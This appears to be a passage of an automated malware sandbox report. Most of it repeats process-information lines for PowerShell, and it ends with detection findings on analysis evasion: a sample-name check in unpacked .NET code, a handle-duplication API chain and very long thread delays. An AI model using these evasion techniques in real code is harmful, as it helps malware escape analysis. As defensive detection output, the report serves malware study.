                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                .NET source code contains a sample name check
                Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.cs.Net Code: Main contains sample name check
                Source: 10.2.powershell.exe.89f0000.3.raw.unpack, ymdoz.cs.Net Code: Main contains sample name check
                Source: 10.2.powershell.exe.5cdeb28.1.raw.unpack, ymdoz.cs.Net Code: Main contains sample name check
                Source: 10.2.powershell.exe.5edd388.2.raw.unpack, ymdoz.cs.Net Code: Main contains sample name check
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
